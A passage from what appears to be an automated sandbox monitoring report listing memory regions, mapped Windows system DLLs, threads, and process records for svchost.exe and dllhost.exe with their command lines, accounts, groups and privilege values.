end_va = 0x4dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 37983 start_va = 0x90000 end_va = 0x96fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 37984 start_va = 0xa0000 end_va = 0xa1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 37985 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0xc0000 region_type = mapped_file name = "audiodg.exe.mui" filename = "\\Windows\\System32\\en-US\\audiodg.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\audiodg.exe.mui") Region: id = 37986 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 37987 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 37988 start_va = 0x76000000 end_va = 0x7609ffff entry_point = 0x76000000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 37989 start_va = 0x4e0000 end_va = 0x53bfff entry_point = 0x4e0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 37990 start_va = 0x4e0000 end_va = 0x53bfff entry_point = 0x4e0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 37991 start_va = 0x75ba0000 end_va = 0x75babfff entry_point = 0x75ba0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 37992 start_va = 0x5f0000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 37993 start_va = 0x75c40000 end_va = 0x75c4dfff entry_point = 0x75c40000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 37994 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 37999 start_va = 0x75060000 end_va = 0x75080fff entry_point = 0x75060000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 38000 start_va = 0x77730000 end_va = 0x77774fff entry_point = 0x77730000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 38003 start_va = 0x660000 end_va = 0x69ffff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 38004 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 38008 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 38009 start_va = 0x760d0000 end_va = 0x76152fff entry_point = 0x760d0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 38010 start_va = 0x75740000 end_va = 0x75755fff entry_point = 0x75740000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 38011 start_va = 0x4e0000 end_va = 0x51bfff entry_point = 0x4e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38012 start_va = 0x4e0000 end_va = 0x51bfff entry_point = 0x4e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38013 start_va = 0x4e0000 end_va = 0x51bfff entry_point = 0x4e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38014 start_va = 0x4e0000 end_va = 0x51bfff entry_point = 0x4e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38015 start_va = 0x4e0000 end_va = 0x51bfff entry_point = 0x4e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38016 start_va = 0x754e0000 end_va = 0x7551afff entry_point = 0x754e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38017 start_va = 0x6f0000 end_va = 0x9befff entry_point = 0x6f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 38018 start_va = 0x560000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 38019 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 38020 start_va = 0x5b0000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 38021 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Thread: id = 1165 os_tid = 0x39c Thread: id = 1166 os_tid = 0x3a0 Thread: id = 1168 os_tid = 0x3a8 Thread: id = 1170 os_tid = 0x3b0 Thread: id = 1171 os_tid = 0x3b4 Process: id = "677" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7f1d1200" os_pid = "0x3f0" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "667" os_parent_pid = "0x1c0" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d2a1" [0xc000000f], "LOCAL" [0x7] Region: id = 38116 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 38117 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 38118 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 38119 start_va = 0xbd0000 end_va = 0xbd7fff entry_point = 0xbd0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 38120 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 38121 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 38122 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 38123 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 38124 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 38125 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 38135 start_va = 0xf0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 38136 start_va = 0x77990000 end_va = 0x77a63fff entry_point = 0x77990000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 38137 start_va = 0x75eb0000 end_va = 0x75ef9fff entry_point = 0x75eb0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 38138 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 38139 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 38140 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 38141 start_va = 0x1c0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 38142 start_va = 0x75f50000 end_va = 0x75ffbfff entry_point = 0x75f50000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 38143 start_va = 0x77c40000 end_va = 0x77c58fff entry_point = 0x77c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 38144 start_va = 0x77c80000 end_va = 0x77d20fff entry_point = 0x77c80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 38145 start_va = 0x50000 end_va = 0x7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 38146 start_va = 0x76270000 end_va = 0x763cbfff entry_point = 0x76270000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 38147 start_va = 0x77160000 end_va = 0x771adfff entry_point = 0x77160000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 38148 start_va = 0x77780000 end_va = 0x77848fff entry_point = 0x77780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 38149 start_va = 0x77c60000 end_va = 0x77c69fff entry_point = 0x77c60000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 38150 start_va = 0x77210000 end_va = 0x772acfff entry_point = 0x77210000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 38151 start_va = 0x2c0000 end_va = 0x387fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 38152 start_va = 0x50000 end_va = 0x6cfff entry_point = 0x50000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 38153 start_va = 0x70000 end_va = 0x7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 38154 start_va = 0x50000 end_va = 0x6cfff entry_point = 0x50000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 38155 start_va = 0x77100000 end_va = 0x7711efff entry_point = 0x77100000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 38156 start_va = 0x763d0000 end_va = 0x7649bfff entry_point = 0x763d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 38157 start_va = 0x390000 end_va = 0x490fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 38158 start_va = 0x4a0000 end_va = 0x51ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 38159 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 38160 start_va = 0x50000 end_va = 0x51fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 38161 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 38162 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 38163 start_va = 0x160000 end_va = 0x1bbfff entry_point = 0x160000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 38164 start_va = 0x520000 end_va = 0x912fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 38165 start_va = 0x160000 end_va = 0x1bbfff entry_point = 0x160000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 38166 start_va = 0x75ba0000 end_va = 0x75babfff entry_point = 0x75ba0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 38167 start_va = 0xa30000 end_va = 0xa6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 38168 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 38169 start_va = 0x76000000 end_va = 0x7609ffff entry_point = 0x76000000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 38179 start_va = 0x970000 end_va = 0x9affff entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 38180 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 38181 start_va = 0xaf0000 end_va = 0xb2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 38182 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 38185 start_va = 0xa90000 end_va = 0xacffff entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 38186 start_va = 0xbe0000 end_va = 0xeaefff entry_point = 0xbe0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 38187 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 38188 start_va = 0x73ee0000 end_va = 0x73f26fff entry_point = 0x73ee0000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 38189 start_va = 0x77a70000 end_va = 0x77afefff entry_point = 0x77a70000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 38190 start_va = 0x75740000 end_va = 0x75755fff entry_point = 0x75740000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 38191 start_va = 0x160000 end_va = 0x19bfff entry_point = 0x160000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38192 start_va = 0x160000 end_va = 0x19bfff entry_point = 0x160000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38193 start_va = 0x160000 end_va = 0x19bfff entry_point = 0x160000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38194 start_va = 0x160000 end_va = 0x19bfff entry_point = 0x160000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38195 start_va = 0x160000 end_va = 0x19bfff entry_point = 0x160000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38196 start_va = 0x754e0000 end_va = 0x7551afff entry_point = 0x754e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38197 start_va = 0x75c40000 end_va = 0x75c4dfff entry_point = 0x75c40000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 38396 start_va = 0x90000 end_va = 0x90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 38397 start_va = 0xf40000 end_va = 0xf7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 38398 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 38399 start_va = 0x760d0000 end_va = 0x76152fff entry_point = 0x760d0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 38428 start_va = 0xfb0000 end_va = 0xfeffff entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 38429 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 38434 start_va = 0x9b0000 end_va = 0xa2ffff entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Thread: id = 1186 os_tid = 0x3f4 Thread: id = 1187 os_tid = 0x3f8 Thread: id = 1190 os_tid = 0x404 Thread: id = 1193 os_tid = 0x410 Thread: id = 1194 os_tid = 0x414 Thread: id = 1198 os_tid = 0x424 Thread: id = 1202 os_tid = 0x434 Thread: id = 1231 os_tid = 0x4bc Process: id = "678" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x7f1d1220" os_pid = "0x440" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "670" os_parent_pid = "0x23c" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000c468" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 38442 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 38443 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 38444 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 38445 start_va = 0x9c0000 end_va = 0x9c4fff entry_point = 0x9c0000 region_type = mapped_file name = "dllhost.exe" filename = "\\Windows\\System32\\dllhost.exe" (normalized: "c:\\windows\\system32\\dllhost.exe") Region: id = 38446 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 38447 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 38448 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 38449 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 38450 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 38451 start_va = 0x40000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x0000000000040000" filename = "" Region: id = 38452 start_va = 0x77990000 end_va = 0x77a63fff entry_point = 0x77990000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 38453 start_va = 0x75eb0000 end_va = 0x75ef9fff entry_point = 0x75eb0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 38454 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 38455 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 38456 start_va = 0x40000 end_va = 0xa6fff entry_point = 0x40000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 38457 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 38458 start_va = 0x75f50000 end_va = 0x75ffbfff entry_point = 0x75f50000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 38459 start_va = 0x76270000 end_va = 0x763cbfff entry_point = 0x76270000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 38460 start_va = 0x77160000 end_va = 0x771adfff entry_point = 0x77160000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 38461 start_va = 0x77780000 end_va = 0x77848fff entry_point = 0x77780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 38462 start_va = 0x77c60000 end_va = 0x77c69fff entry_point = 0x77c60000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 38463 start_va = 0x77210000 end_va = 0x772acfff entry_point = 0x77210000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 38464 start_va = 0x77c80000 end_va = 0x77d20fff entry_point = 0x77c80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 38465 start_va = 0x230000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 38466 start_va = 0xb0000 end_va = 0xccfff entry_point = 0xb0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 38467 start_va = 0x280000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 38468 start_va = 0xb0000 end_va = 0xccfff entry_point = 0xb0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 38469 start_va = 0x77100000 end_va = 0x7711efff entry_point = 0x77100000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 38470 start_va = 0x763d0000 end_va = 0x7649bfff entry_point = 0x763d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 38471 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 38472 start_va = 0xb0000 end_va = 0xb0fff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 38473 start_va = 0x350000 end_va = 0x450fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 38474 start_va = 0x460000 end_va = 0x4dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 38475 start_va = 0x4e0000 end_va = 0x53bfff entry_point = 0x4e0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 38476 start_va = 0x4e0000 end_va = 0x53bfff entry_point = 0x4e0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 38477 start_va = 0x75ba0000 end_va = 0x75babfff entry_point = 0x75ba0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 38478 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 38479 start_va = 0x760d0000 end_va = 0x76152fff entry_point = 0x760d0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 38480 start_va = 0x76000000 end_va = 0x7609ffff entry_point = 0x76000000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 38481 start_va = 0x77c40000 end_va = 0x77c58fff entry_point = 0x77c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 38482 start_va = 0x77a70000 end_va = 0x77afefff entry_point = 0x77a70000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: 